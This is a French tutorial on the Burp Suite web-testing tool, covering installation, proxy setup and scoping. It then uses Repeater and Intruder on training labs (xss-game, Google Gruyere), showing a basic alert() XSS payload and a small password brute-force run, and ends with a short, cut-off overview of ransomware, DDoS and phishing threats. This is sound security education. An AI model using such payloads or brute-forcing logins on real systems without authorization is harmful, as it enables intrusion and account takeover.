<figure><img src="/files/BLc8v7RE3IwdSJFogHo9" alt=""><figcaption></figcaption></figure>

COMING SOON !!!


# Burp Suite

On va découvrir l'outil mais aussi l'académie BURP qui permet d'apprendre les différentes vulnérabilités et thématiques concernant la sécurité web.

![Burp Suite](https://miro.medium.com/v2/resize:fit:640/1*0xUo7_LpXBXFdAc5J3UAnA.png)

Burp suite, c'est quoi ça?

<figure><img src="/files/A4peaps7CtbmV1QSe3F2" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Burp vous donne un contrôle total, vous permettant de combiner des techniques manuelles avancées avec une automatisation de pointe, afin de rendre votre travail plus rapide, plus efficace et plus amusant.\
\
Définition: [**KALI.ORG**](https://www.kali.org/tools/burpsuite/)
{% endhint %}

En termes simples: Burp Suite est un **framework** écrit en Java, développé par [***PortSwigger Ltd***](https://portswigger.net/), qui vise à fournir un service unique et complet pour les **tests de pénétration des applications web**. À bien des égards, cet objectif est atteint puisque Burp est l'outil standard de l'industrie pour les évaluations pratiques de la sécurité des applications web.&#x20;

La suite Burp est également très couramment utilisée pour évaluer les applications mobiles, car les caractéristiques qui la rendent si attrayante pour les tests d'applications web se traduisent presque parfaitement par des tests des API qui alimentent la plupart des applications mobiles.

{% hint style="info" %}
Framework:

Un framework signifie littéralement « **cadre de travail** ». Il fournit, en effet, une base d'outils et de modules qui peuvent être utilisés sur différents projets. Par exemple, un framework peut inclure des classes, variables et fonctions prédéfinies.\
\
Définition: [**PURE-ILLUSION.COM**](https://www.pure-illusion.com/lexique/definition-de-framework#:~:text=Un%20Framework%20est%20une%20boite,web%20ou%20d'une%20application.)\
\
API:

*API* qui vient de l'anglais **Application Programming Interface,** ou interface de programmation d'application, est un ensemble de définitions et de protocoles qui facilite la création et l'intégration des applications. \
\
Définition: [**REDHAT**](https://www.redhat.com/fr/topics/api/what-are-application-programming-interfaces)
{% endhint %}

Au niveau le plus simple, Burp peut capturer et manipuler tout le trafic entre un attaquant et un serveur web : c'est le noyau du framework. Après avoir capturé les requêtes, nous pouvons choisir de les envoyer à diverses autres parties de Burp (que nous aborderons plus en détail par la suite):

* Intruder
* Repeater&#x20;
* Collaborator
* Extender
* Proxy
* ...

## Objectif et présentation

Le but est donc de découvrir comment fonctionne BURP SUITE, de l'installation jusqu'à l'exploitation des vulnérabilités.

L'académie PortSwigger propose la théorie et les labs pour apprendre à utiliser burp mais aussi les vulnérabiltiés liées aux applications web.\ <br>

<figure><img src="/files/TTEUJsqjSALYzWbEQ1VF" alt=""><figcaption><p>Un exemple des thèmes et des labs disponibles</p></figcaption></figure>

Tryhackme propose aussi des cours sur l'utilisation de BURP, nous en reparlerons à la fin de la capsule. :smile:

L'aventure sera longue mais elle en vaut la chandelle !

<figure><img src="/files/6HFGyAC9hlRCuJbfLwh9" alt=""><figcaption></figcaption></figure>


# Installation

<figure><img src="/files/V7E5Jv01KUyR2gVreAWa" alt=""><figcaption></figcaption></figure>

## Windows

### Téléchargement

Utilisez les liens ci-dessous pour télécharger la dernière version de Burp Suite Professional ou Community Edition.

| Version                                                                         | D                |
| ------------------------------------------------------------------------------- | ---------------- |
| [**Professional**](https://portswigger.net/burp/releases/professional/latest)   | Version payante  |
| [**Community Edition**](https://portswigger.net/burp/releases/community/latest) | Version gratuite |

### Installation

Exécutez le programme d'installation et lancez Burp Suite.

Lorsqu'il vous est demandé de sélectionner un fichier de projet et une configuration, cliquez simplement sur Suivant puis sur Démarrer Burp pour ne pas avoir à le faire pour l'instant.

{% hint style="info" %}
Si vous utilisez Burp Suite Professional, entrez votre clé de licence lorsque vous y êtes invité. Si vous n'en avez pas encore, vous pouvez vous abonner ou demander un essai gratuit.
{% endhint %}

<figure><img src="/files/PZpChcmJZ97ziIR6BKKW" alt=""><figcaption><p>Fenêtre pour introduire la clé de licence Burp Pro</p></figcaption></figure>

### Run

Lorsque Burp est lancé vous obtenez l'écran suivant:

<figure><img src="/files/PabdDV1xDmKZMqjAz3gL" alt=""><figcaption></figcaption></figure>

Vous pouvez conserver toutes les données et tous les paramètres de configuration d'un travail particulier dans un fichier de projet Burp. Le fichier enregistre les données de manière incrémentielle au fur et à mesure que vous travaillez. Il n'est pas nécessaire d'enregistrer manuellement votre travail.

{% hint style="danger" %}
Lorsque vous testez certaines applications, cela peut générer plusieurs gigaoctets de données. Assurez-vous de disposer de suffisamment d'espace disque libre lorsque vous utilisez des fichiers de projet Burp.
{% endhint %}

Vous pouvez sélectionner ou créer un fichier de projet à partir de l'assistant de démarrage. Les options disponibles dépendent de l'édition de Burp Suite que vous utilisez :

<table><thead><tr><th width="168.33333333333331">Type de projet</th><th width="253">Edition</th><th>Description</th></tr></thead><tbody><tr><td>Temporaire</td><td>Communauty et Professional</td><td>Sélectionnez cette option pour les tâches rapides pour lesquelles vous n'avez pas besoin de sauvegarder votre travail. Toutes les données sont conservées en mémoire et sont perdues lorsque vous fermez Burp.</td></tr><tr><td>Nouveau projet sur disque</td><td>Professional</td><td>Créez un nouveau fichier de projet. Ce fichier contient toutes les données et la configuration du projet.</td></tr><tr><td>Ouvrir projet existant</td><td>Professional</td><td>Pour rouvrir un fichier de projet. Vous pouvez choisir dans une liste de projets récemment ouverts.</td></tr></tbody></table>

## Kali linux

Burp community est installé par défaut sur les versions de Kali linux:

<figure><img src="/files/b8XDtIYoSj6V9bB1CXwH" alt=""><figcaption></figcaption></figure>


# Intercepter le trafic HTTP avec Burp Proxy

Burp Proxy vous permet d'intercepter les requêtes et les réponses HTTP envoyées entre le navigateur de Burp et le serveur cible. Cela vous permet d'étudier le comportement du site web lorsque vous effectuez différentes actions.

Mais comment fonctionne un proxy?

<figure><img src="/files/ELwiWONxrjf0a2lt3TpA" alt=""><figcaption></figcaption></figure>

## Comment fonctionne un proxy?

### Définition

{% hint style="info" %}
**Un proxy est essentiellement un intermédiaire entre votre ordinateur (ou tout autre appareil que vous utilisez pour accéder à Internet) et le site web ou le service auquel vous essayez d'accéder. Quand vous utilisez un proxy, votre requête Internet est envoyée d'abord au serveur proxy, puis il l'envoie à Internet en votre nom et reçoit la réponse, qui est ensuite transmise à votre appareil. Cela peut fournir des avantages en termes de confidentialité et de sécurité, car le site web ou service ne voit pas directement votre appareil, mais plutôt le serveur proxy.**
{% endhint %}

### Schéma

Pour visualiser le processus, voici un schéma simple :

<figure><img src="/files/2cT01Qhu7q2A7fHBSeKq" alt=""><figcaption></figcaption></figure>

Comme un serveur proxy possède sa propre adresse IP, il sert d'intermédiaire entre un ordinateur et l'internet. Votre ordinateur connaît cette adresse et, lorsque vous envoyez une requête sur l'internet, celle-ci est acheminée vers le proxy, qui reçoit alors la réponse du serveur web et transmet les données de la page au navigateur de votre ordinateur, tel que Chrome, Safari, Firefox ou Microsoft Edge.

### Exemples d'utilisation

1. **Anonymat :** Les proxies peuvent masquer votre adresse IP réelle, ce qui rend difficile pour les sites web de suivre votre activité en ligne.
2. **Sécurité :** Les proxies peuvent filtrer le trafic entrant pour bloquer les menaces potentielles avant qu'elles n'atteignent votre appareil.
3. **Contournement des restrictions géographiques :** Par exemple, si un certain contenu n'est disponible que pour les utilisateurs dans une certaine région, vous pouvez utiliser un proxy situé dans cette région pour y accéder.

### Types de proxy

Il existe différents types de proxy, dont voici quelques exemples :

1. **Proxy HTTP :** Ce sont les types de proxy les plus courants, utilisés pour le trafic web. Ils peuvent aider à cacher votre identité en ligne et à accéder à des sites web bloqués.
2. **Proxy SOCKS :** Contrairement aux proxies HTTP, les proxies SOCKS peuvent gérer tout type de trafic, pas seulement le trafic web. Ils sont donc plus polyvalents, mais aussi plus lents.
3. **Proxies transparents :** Ces proxies ne cachent pas l'adresse IP de l'utilisateur et sont souvent utilisés pour le cache de contenu et la mise en réseau à grande échelle.
4. **Proxies anonymes :** Ces proxies cachent votre adresse IP, mais ils indiquent aux sites web qu'ils sont un proxy. Ils offrent un certain niveau d'anonymat, mais pas autant que les proxies dits "élites".
5. **Proxies d'élite :** Ces proxies cachent à la fois votre adresse IP et le fait qu'ils sont un proxy. Ils offrent le plus haut niveau d'anonymat.

Les utilisations concrètes de ces types de proxy varient. Par exemple, un proxy HTTP peut être utilisé pour surfer anonymement sur le web, tandis qu'un proxy SOCKS peut être utilisé pour le torrenting. Les proxies transparents sont souvent utilisés par les entreprises pour le cache de contenu et l'équilibrage de charge, tandis que les proxies anonymes et d'élite peuvent être utilisés pour des activités nécessitant un haut niveau de confidentialité et d'anonymat.

## Proxy HTTP avec BURP

### Browser via BURP

Burp Proxy vous permet d'intercepter les requêtes et les réponses HTTP envoyées entre le navigateur de Burp et le serveur cible. Cela vous permet d'étudier le comportement du site web lorsque vous effectuez différentes actions.

1\) Lancez le navigateur de Burp:

* Allez dans l'onglet Proxy > Interception.

<figure><img src="/files/arChXALmCMuRu965x9zq" alt=""><figcaption></figcaption></figure>

* Cela permet de lancer le navigateur de Burp, qui est préconfiguré pour fonctionner avec Burp directement:

<figure><img src="/files/GgEtz6KlHEJILwa1B3ll" alt=""><figcaption></figcaption></figure>

### Configuration manuelle

Il est possible de configurer son Browser pour qu'il puisse intercepter les requêtes sans utiliser le Browser par défaut de BURP.

#### Addon: FoxyProxy

Un Addon vous permet de faciliter la configuration. Il existe sur Firefox et Google Chrome.

<figure><img src="/files/NKdMvTNlvAK97iJydqSo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3p5cOwCma3KVEe4ns9tk" alt=""><figcaption></figcaption></figure>

#### Configurer l'Addon

1\) Ouvrir l'option de l'addon&#x20;

<figure><img src="/files/X6FuhzceJ12ZKy7dt3iG" alt=""><figcaption></figcaption></figure>

2\) Ajouter votre configuration

<figure><img src="/files/RK6FyHrDjeHPudgJcsMa" alt=""><figcaption></figcaption></figure>

* Nom: Burp Proxy
* Type de Proxy: HTTP
* Adresse IP: 127.0.0.1 (que vous pouvez retrouver dans les options BURP)
* Port: 8080 par défaut (vous pouvez le changer aussi dans les options BURP)

<figure><img src="/files/8OdvJeZyFahMXynwyf2A" alt=""><figcaption></figcaption></figure>

* Sauvegarder

3\) Résultat:

<figure><img src="/files/zIgjcB3hLrV2G0rFnaRj" alt=""><figcaption></figcaption></figure>

## Intercepter une requête HTTP

### Intercepter

Cliquez sur le bouton "Intercept is off" pour qu'il devienne "Intercept is on".

<figure><img src="/files/0UWaZ5QKBRI98k9sKtNC" alt=""><figcaption></figcaption></figure>

En utilisant le navigateur de Burp ou votre navigateur avec l'addon FoxyProxy, essayez de visiter un site (exemple: google.com) et observez que le site ne se charge pas.&#x20;

Le proxy Burp a intercepté la requête HTTP émise par le navigateur avant qu'il ne puisse atteindre le serveur. Vous pouvez voir cette requête interceptée dans l'onglet Proxy > Intercepter.

<figure><img src="/files/lQI75YVFMEz7aX8EHvRS" alt=""><figcaption></figcaption></figure>

La requête est conservée ici pour que vous puissiez l'étudier, voire la modifier, avant de la transmettre au serveur cible.

### Transférer la requête

Cliquez plusieurs fois sur le bouton "FORWARD" pour envoyer la requête interceptée, et toutes les suivantes, jusqu'à ce que la page se charge dans le navigateur de Burp.

<figure><img src="/files/gCPO4DbgEmfwxnbGVII2" alt=""><figcaption></figcaption></figure>

### Désactiver l'interception&#x20;

En raison du nombre de requêtes que les navigateurs envoient généralement, vous ne voudrez souvent pas intercepter chacune d'entre elles. Cliquez sur le bouton "Intercept is on" pour que l'interception soit désactivée.

Pour tester que les requêtes ne sont plus interceptées, retournez dans le navigateur et confirmez que vous pouvez maintenant interagir avec le site comme d'habitude.

### Afficher l'historique HTTP&#x20;

Dans Burp, allez dans l'onglet Proxy > Historique HTTP. Vous pouvez y voir l'historique de tout le trafic HTTP qui a transité par le proxy Burp, même lorsque l'interception était désactivée.

<figure><img src="/files/TlbH6F119xuyADR5g7dd" alt=""><figcaption></figcaption></figure>

Cliquez sur n'importe quelle entrée de l'historique pour afficher la requête HTTP brute, ainsi que la réponse correspondante du serveur.

<figure><img src="/files/KvQd9sZg4Ot7Qa1Xqeku" alt=""><figcaption></figcaption></figure>


# Définir le périmètre

Le champ d'application cible indique à Burp les URLs et les hôtes que vous souhaitez tester. Cela vous permet de filtrer le trafic généré par votre navigateur et d'autres sites, afin de vous concentrer sur le trafic qui vous intéresse.

<figure><img src="/files/51OpPDGrYBt5KHV7TqSx" alt=""><figcaption></figcaption></figure>

## Google Gruyere

Ce site imite les principes d'un réseau social très basique, où vous pouvez créer un profil d'utilisateur (nom, photo, message et site web épinglés...), le gérer et poster de courts messages (des snippets dans ce cas), il est donc tout à fait approprié comme matériel d'étude.

Voici le lien: <https://google-gruyere.appspot.com/>

Le lien vous dirigera vers votre instance (cf. image ci-dessous, derrière l'URL il y a mon numéro d'instance).

<figure><img src="/files/jSynVXFr3sccewocyRvz" alt=""><figcaption></figcaption></figure>

Le laboratoire montre comment les vulnérabilités des applications web peuvent être exploitées et comment se défendre contre ces attaques. Dans le lab, vous pratiquerez le cross-site scripting (XSS), le cross-site request forgery (XSRF),... et vous aurez également l'occasion d'évaluer les impacts de telles vulnérabilités (déni de service, divulgation d'informations, exécution de code à distance...).

## Démarrer votre Proxy

Selon ce que vous utilisez, démarrer soit le browser BURP soit votre addon FoxyProxy.

Ensuite, vous allez sur l'URL de votre GRUYERE via votre navigateur:

{% hint style="info" %}
[https://google-gruyere.appspot.com/658170968763XXXXXXXXXXXXXXXXXXXXXXXXXX/](https://google-gruyere.appspot.com/658170968763413448899493058955923664773/)
{% endhint %}

Maintenant, essayez de parcourir un peu l'application en cliquant sur les features que vous voyez:

* Sign In
* Sign Up
* Home

## Analyser votre trafic Proxy

Dans Burp, allez dans l'onglet Proxy > HTTP History. Pour faciliter la lecture, continuez à cliquer sur l'en-tête de la colonne la plus à gauche (#) jusqu'à ce que les demandes soient triées par ordre décroissant. De cette façon, vous pouvez voir les demandes les plus récentes en haut de l'écran.

<figure><img src="/files/bwAPo1oMNbXEBXKQX3AS" alt=""><figcaption></figcaption></figure>

Notez que l'historique HTTP affiche les détails de chaque requête effectuée par le navigateur, y compris les requêtes adressées à des sites web tiers qui ne vous intéressent pas.

## Définir la cible

Allez dans Target > Site map. Dans le panneau de gauche, vous pouvez voir une liste d'hôtes avec lesquels votre navigateur a interagi. Cliquez avec le bouton droit de la souris sur le nœud du site cible et cliquez sur  "Add to scope". Lorsque vous y êtes invité dans une fenêtre contextuelle, cliquez sur Oui pour exclure le trafic hors du champ d'application.

<figure><img src="/files/q8zRIeWOZHQnGP085FVZ" alt=""><figcaption></figcaption></figure>

Cliquez sur le filtre d'affichage au-dessus de l'historique HTTP et sélectionnez Afficher uniquement les éléments dans le champ d'application.

<figure><img src="/files/sgpAPI9dBLHvkLG9pDCJ" alt=""><figcaption></figcaption></figure>

Faites défiler votre historique HTTP. Remarquez qu'il n'affiche plus que les entrées provenant du site web cible. Toutes les autres entrées ont été masquées. Cela simplifie grandement l'historique, qui ne contient plus que les éléments qui vous intéressent.

Si vous continuez à naviguer sur le site cible, vous remarquerez que le trafic hors périmètre n'est plus enregistré dans le plan du site ou dans l'historique du proxy.


# Intruder et Repeater

Repeater

Burp Repeater est un outil qui vous permet de modifier et d'envoyer un message HTTP ou WebSocket intéressant à plusieurs reprises.

Vous pouvez utiliser Repeater à toutes sortes de fins, par exemple pour :

* Envoyer une requête avec des valeurs de paramètres variables pour tester les vulnérabilités basées sur les entrées.&#x20;
* Envoyer une série de requêtes HTTP dans une séquence spécifique pour tester les vulnérabilités dans les processus à plusieurs étapes, ou les vulnérabilités qui reposent sur la manipulation de l'état de la connexion.&#x20;
* Vérifier manuellement les problèmes signalés par Burp Scanner.&#x20;

Repeater vous permet de travailler simultanément sur plusieurs messages, chacun dans son propre onglet. Toutes les modifications apportées à un message sont enregistrées dans l'historique de l'onglet. La fonction de regroupement vous permet de gérer facilement un grand nombre d'onglets ouverts.

Envoi d'une requête à Burp Repeater&#x20;

La façon la plus courante d'utiliser Burp Repeater est de lui envoyer une requête à partir d'un autre outil de Burp. Dans cet exemple, nous enverrons une requête à partir de l'onglet "Proxy > Intercept".

### Target

Pour cette partie, nous allons utilisé la cible suivante:

* <http://xss-game.appspot.com/>

C'est une application en mode "jeu" qui possède plusieurs niveaux de failles XSS.

Petit rappel:

{% hint style="info" %}
XSS:

Cross-site scripting (XSS) est une faille de sécurité qui permet à un attaquant d'injecter dans un site web un code client malveillant. Ce code est exécuté par les victimes et permet aux attaquants de contourner les contrôles d'accès et d'usurper l'identité des utilisateurs. Selon le projet Open Web Application Security, XSS était la [troisième cause de vulnérabilité des applications du web](https://www.owasp.org/index.php/Top_10_2013-Top_10) en 2013.\
\
Définition: [**DEVELOPPER.MOZILLA.ORG**](https://developer.mozilla.org/fr/docs/Glossary/Cross-site_scripting)
{% endhint %}

### Étape 1 : Envoyer la requête au Repeater

Dans le tutoriel précédent, vous avez appris à intercepter une requête. Nous allons faire de même avec le niveau 1 sur notre cible.

Dans le premier niveau, il nous est demandé d'introduire une demande dans la barre de recherche, nous allons donc intercepter cette requête:

<figure><img src="/files/pvzyXCpNbFEZsnuLfenY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OTiMkLwYGon6ZpFm8DOo" alt=""><figcaption></figcaption></figure>

Maintenant, nous allons faire un clique-droit sur la requête et faire "Send to Repeater" ou le raccourci clavier "CTRL-R":

<figure><img src="/files/P1ZKS9xZoyt5cpXAP5ES" alt=""><figcaption></figcaption></figure>

Dans l'onglet "Repeater", nous voyons notre requête à gauche, une fois que nous cliquons sur le bouton "Send", nous voyons la réponse apparaître sur le volet de droite:

<figure><img src="/files/3XDZIFmjYZkgFySrSQ2q" alt=""><figcaption></figcaption></figure>

### Étape 2: Modifier la valeur dans le Repeater

Il est donc possible de modifier notre requête à gauche pour tenter de trouver la faille et passer au niveau 2 de notre jeu XSS.

Essayons de remplacer la valeur de "query" par "\</script>alert('1')\</script>".

{% hint style="info" %}
\</script>alert('1')\</script> est un payload XSS. La fonction alert() en javascript permet d'afficher une fenêtre "pop-up" pour afficher le message (dans notre cas le chiffre 1).

Ce payload est très utilisé et il permet d'avoir directement un visuel sur notre browser si la fonction est appelée.
{% endhint %}

<figure><img src="/files/T6QxqEKa7dBlDZRiTVgL" alt=""><figcaption></figcaption></figure>

Nous voyons dans la sortie que mes balises de script sont toujours intactes, ce qui signifie que notre attaque XSS pourrait fonctionner.&#x20;

À partir de là, deux options s'offrent à nous:&#x20;

* Copier/coller l'url avec le payload dans le site web et le tester manuellement;
* Utiliser Burp pour automatiser une requête du navigateur.&#x20;

Pour la démonstration nous allons montrer l'input directement sur le site:

* Dans la barre de recherche, on introduit notre payload:

<figure><img src="/files/c41Bta3QKUCy8fDGUOSt" alt=""><figcaption></figcaption></figure>

* Le résultat:

<figure><img src="/files/4SjC8rGPyvt0sgDLQ70D" alt=""><figcaption></figcaption></figure>

-> On obtient bien un "pop-up" qui indique que la vulnérabilité a été exploitée et que nous pouvons passer au niveau suivant.

* La réponse de notre requête:

<figure><img src="/files/FakabKeVooyO7UE337OQ" alt=""><figcaption></figcaption></figure>

-> Identique à celle que nous avons dans le Repeater

### Conclusion

Repeater est un outil d'altération manuelle qui vous permet de copier des requêtes provenant d'autres outils (Proxy, Target, etc.) et de les modifier avant de les envoyer à nouveau à la cible. Le Repeater permet de modifier facilement la charge utile et fournit également des liens permettant de répéter rapidement l'attaque dans le navigateur.

Voila pour notre introduction du Repeater, passons maintenant à l'intruder !

## Intruder

Imaginons que nous voulions nous connecter à une application mais que nous ne connaissions pas le nom d'utilisateur ou le mot de passe. Nous pourrions copier une demande de connexion dans l'outil Repeater, puis sélectionner manuellement le nom d'utilisateur et le mot de passe et les remplacer à chaque fois par des options d'une liste.

Bien sûr, nous devrions faire cela des centaines, voire des milliers de fois. Si nous voulons automatiser un processus comme celui-ci, où nous avons un paramètre changeant et un ensemble connu de valeurs que nous voulons essayer, alors il est temps d'utiliser l'outil **Intruder**.

{% hint style="info" %}
Burp Intruder est un outil permettant d'automatiser des attaques personnalisées contre des applications web. Il vous permet de configurer des attaques qui envoient la même requête HTTP à plusieurs reprises, en insérant à chaque fois des charges utiles différentes dans des positions prédéfinies.
{% endhint %}

## Target

Pour cette partie, on va utiliser l'application Google Gruyere qui nous permet de nous connecter à un compte.

### Étape 1 : Envoyer la requête à l'Intruder

Comme nous avons fait pour le Repeater, nous allons intercepter la requête de connexion avec le nom d'utilisateur et le mot de passe.

La fonction de connexion est le "Sign In" dans Google Gruyere:

<figure><img src="/files/EO5FlWxzfnbKx6YVPWSc" alt=""><figcaption></figcaption></figure>

{% hint style="danger" %}
Avant de faire le tuto Intruder, utilisez la fonction "Sign up". Elle permet de créer un compte sur l'application. Dans mon exemple, l'utilisateur à le nom "test".
{% endhint %}

La requête capturée sur Burp:

<figure><img src="/files/bJz7C6gth1ycs66lBSDP" alt=""><figcaption></figcaption></figure>

Maintenant, nous allons faire un clique-droit sur la requête et faire "Send to Intruder" ou le raccourci clavier "CTRL-I":

<figure><img src="/files/26Tk6V6BHuSd55j6pQDm" alt=""><figcaption></figcaption></figure>

### Étape 2: Modifier les valeurs dans l'onglet Positions

Dans l'onglet "Intruder", nous voyons plusieurs onglets ainsi que notre requête:

* Tout d'abord, on remarque que des valeurs sont surlignées:

<figure><img src="/files/Wa7CNWxuUso1yPiVcsBU" alt=""><figcaption></figcaption></figure>

-> Nous allons donc "Clear" toutes les informations et sélectionner juste la valeur du mot de passe (derrière le "pw=").

<figure><img src="/files/PuvcMpQYEEIKuWaboXiL" alt=""><figcaption></figcaption></figure>

#### Types d'attaque

Nous allons définir les différents types d'attaque:

{% hint style="success" %}
**Sniper**:

Cette attaque place chaque charge utile dans chaque position de charge utile à tour de rôle. Elle utilise un seul ensemble de données utiles.

Le nombre total de requêtes générées par l'attaque est le produit du nombre de positions et du nombre de payloads dans l'ensemble de payloads.

L'attaque Sniper est utile pour analyser individuellement un certain nombre de paramètres de demande afin de détecter des vulnérabilités courantes.
{% endhint %}

{% hint style="success" %}
**Battering Ram**:

Cette attaque place simultanément la même charge utile dans toutes les positions de charge utile définies. Elle utilise un seul ensemble de charges utiles.

Le nombre total de requêtes générées par l'attaque correspond au nombre de charges utiles de l'ensemble de charges utiles.

L'attaque "Battering Ram" est utile lorsqu'une attaque nécessite l'insertion d'une même donnée à plusieurs endroits de la requête. Par exemple, un nom d'utilisateur dans un cookie et un paramètre du corps de la requête.
{% endhint %}

{% hint style="success" %}
**Pitchfork**:

Cette attaque itère à travers un ensemble de charges utiles différentes pour chaque position définie. Les charges utiles sont placées simultanément dans chaque position. Par exemple, les trois premières requêtes seraient les suivantes :

* Première demande :

Position 1 = Première charge utile de l'ensemble 1.&#x20;

Position 2 = première charge utile de l'ensemble 2.&#x20;

* Deuxième demande :

Position 1 = Deuxième charge utile de l'ensemble 1.&#x20;

Position 2 = deuxième charge utile de l'ensemble 2.&#x20;

* Troisième demande :

Position 1 = Troisième charge utile de l'ensemble 1.&#x20;

Position 2 = Troisième charge utile de l'ensemble 2.&#x20;

Le nombre total de demandes générées par l'attaque correspond au nombre de charges utiles dans le plus petit ensemble de charges utiles.

L'attaque Pitchfork est utile lorsqu'une attaque nécessite l'insertion de données différentes mais connexes à plusieurs endroits de la demande. Par exemple, pour placer un nom d'utilisateur dans un paramètre et un numéro d'identification connu correspondant à ce nom d'utilisateur dans un autre paramètre.
{% endhint %}

{% hint style="success" %}
**Cluster bomb**:

Cette attaque utilise de manière itérative un ensemble de charges utiles différent pour chaque position définie. Les charges utiles sont placées à partir de chaque ensemble à tour de rôle, de sorte que toutes les combinaisons de charges utiles sont testées. Par exemple, les trois premières requêtes seraient les suivantes :

* Première demande :

Position 1 = première charge utile de l'ensemble 1.&#x20;

Position 2 = première charge utile de l'ensemble 2.&#x20;

* Deuxième demande :

Position 1 = première charge utile de l'ensemble 1.&#x20;

Position 2 = deuxième charge utile de l'ensemble 2.&#x20;

* Troisième demande :

Position 1 = Première charge utile de l'ensemble 1.&#x20;

Position 2 = Troisième charge utile de l'ensemble 2.&#x20;

Le nombre total de demandes générées par l'attaque est le produit du nombre de charges utiles dans tous les ensembles de charges utiles définis - ce nombre peut être extrêmement élevé.

L'attaque par bombes à fragmentation est utile lorsqu'une attaque nécessite l'insertion de données inconnues ou sans rapport entre elles à plusieurs endroits de la demande. Par exemple, lorsqu'il s'agit de deviner un nom d'utilisateur et un mot de passe.
{% endhint %}

Dans notre cas, nous avons le nom d'utilisateur et nous devons trouver le mot de passe, du coup il nous faut l'attaque Sniper.

### Étape 3: Modifier les valeurs dans l'onglet Payload

Nous utiliserons "Simple list" comme type de charge utile, mais il existe de nombreuses autres options, comme "numbers", qui pourrait être utilisé pour trouver des identifiants ou modifier une valeur dans une chaîne de caractères plus longue.

Si vous disposez de la version Pro, vous pouvez utiliser des listes prédéfinies dans Burp. Si vous utilisez la version gratuite, vous pouvez soit charger une liste (par exemple "Rock you" pour les mots de passe, etc.), soit créer votre propre liste.&#x20;

Pour cet exemple, je vais créer ma propre liste de 10 mots de passe possibles en les tapant et en cliquant sur ajouter. Comme l'ensemble de données utiles "1" a été sélectionné dans la section des ensembles de données utiles, cela s'applique à mon premier paramètre, qui est le mot de passe.

<figure><img src="/files/mqrS8D6i7pTIv2foBt9I" alt=""><figcaption></figcaption></figure>

Nous voyons maintenant que le nombre de requêtes est de 10, ce qui est logique. J'ai 1 nom d'utilisateur (Test) et 10 mots de passe.&#x20;

Si nous essayons toutes les combinaisons (puisque nous avons réglé notre type d'attaque sur "Sniper"), nous allons avoir 10 requêtes au total.

Ensuite, nous cliquons sur "Start Attack" dans les options "Payload Sets". Si vous avez la version gratuite, vos attaques seront limitées, donc les grandes listes prendront beaucoup de temps. Les 10 requêtes devraient toutefois être traitées très rapidement.

Une fois l'attaque lancée, nous avons une fenêtre pop-up ouverte qui énumère toutes les requêtes.&#x20;

Dès que l'attaque est terminée, nous remarquons qu'un des payloads (charges utiles) à une plus grande valeur dans la longueur de la réponse:

<figure><img src="/files/ndvGujpcyIZeVhLlkC3Z" alt=""><figcaption></figcaption></figure>

Vu que tous les statuts des réponses sont à 200, la longueur indiquerait que nous avons trouvé la bonne valeur.

{% hint style="info" %}
Code 200 OK:

Le code de statut de réponse HTTP **`200 OK`** indique la réussite d'une requête. Une réponse 200 peut être mise en cache par défaut.

La signification de la réussite dépend de la méthode de requête HTTP :

* [`GET`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/GET) : la ressource a été récupérée et est transmise dans le corps du message.
* [`HEAD`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/HEAD) : l'ensemble des en-têtes est présent dans la réponse, celle-ci n'a pas de corps.
* [`POST`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/POST) : la ressource qui décrit le résultat d'une action est transmise dans le corps du message.
* [`TRACE`](https://developer.mozilla.org/fr/docs/Web/HTTP/Methods/TRACE) : le corps du message contient le message de requête reçu par le serveur.

SOURCE: [**developer.mozilla.org**](https://developer.mozilla.org/fr/docs/Web/HTTP/Status/200)
{% endhint %}

Essayons notre mot de passe sur la page de login:

<figure><img src="/files/gzFq1JjOmIOlkJLxWW5O" alt=""><figcaption></figcaption></figure>

Ceci termine notre chapitre sur le Repeater et l'Intruder, il y a biensûr encore des options à parcourir surtout dans la partie Intruder, on en discutera par la suite :smile:


# Page 1


# Cybersécurité 2023: 5 menaces majeures et comment s'en protéger

À l'aube de 2024, le paysage numérique est plus complexe que jamais. La cybersécurité est devenue une priorité absolue pour les individus et les entreprises.

<figure><img src="/files/O3in4bgG2EfvdQAFPZ3J" alt=""><figcaption></figcaption></figure>

***

## 1. Ransomwares: L'otage numérique

### **Description**

Les ransomwares chiffrent les données de l'utilisateur, exigeant une rançon pour leur déchiffrement.&#x20;

[**Voir la capsule de Be-Hacktive sur les Ransomware !**](/french/capsule-1-sensibilisation/malware/malware-ransomware)

<figure><img src="/files/PqL01IVXVoB0o8v0YwC4" alt=""><figcaption></figcaption></figure>

### **Faits divers**

* Belgique: [**Cyberattaque en Belgique : la ville de Liège victime d’un rançongiciel**](https://www.lepoint.fr/monde/cyberattaque-en-belgique-la-ville-de-liege-victime-d-un-rancongiciel-21-06-2021-2432063_24.php), en 2021
* France: [**Ransomware : des pirates paralysent un hôpital français et exigent 10 millions d’euros**](https://www.phonandroid.com/ransomware-des-pirates-paralysent-un-hopital-francais-et-exigent-10-millions-deuros.html)**, en 2022**

### Protection

Liste non-exhaustive:&#x20;

* Sauvegardes fréquentes des données.
* Évitez les liens ou pièces jointes suspects.
* Utilisez un logiciel antivirus à jour.

***

## 2. DDoS: La surcharge serveur

### **Description**

Les attaques DDoS inondent un site de trafic, le rendant inaccessible.

<figure><img src="/files/y5T2xIXJ5R8Kxz1qOqD5" alt=""><figcaption></figcaption></figure>

### **Faits divers**

[**GitHub, ciblé en 2018, a subi une attaque massive de 1,35 téraoctets par seconde.**](https://www.lesnumeriques.com/informatique/github-subit-attaque-ddos-massive-sans-precedent-n72155.html)

### Protection

Liste non-exhaustive:&#x20;

* Services de mitigation DDoS.
* Pare-feu robustes.
* Surveillance constante du trafic.

***

## 3. Phishing: L'arnaque numérique

### **Description**

Les attaques de phishing cherchent à tromper l'utilisateur pour obtenir des informations sensibles.

[**La toute première capsule du blog en parle**](/french/capsule-1-sensibilisation/phishing) :smile:

### **Faits divers**

[**En 2017, des employés de Google et Facebook ont été victimes, causant une perte de 100 millions de dollars.**](https://www.france24.com/fr/20170428-google-facebook-victimes-arnaque-100-millions-dollars-lituanie-email-rimasauskas)

### Protection

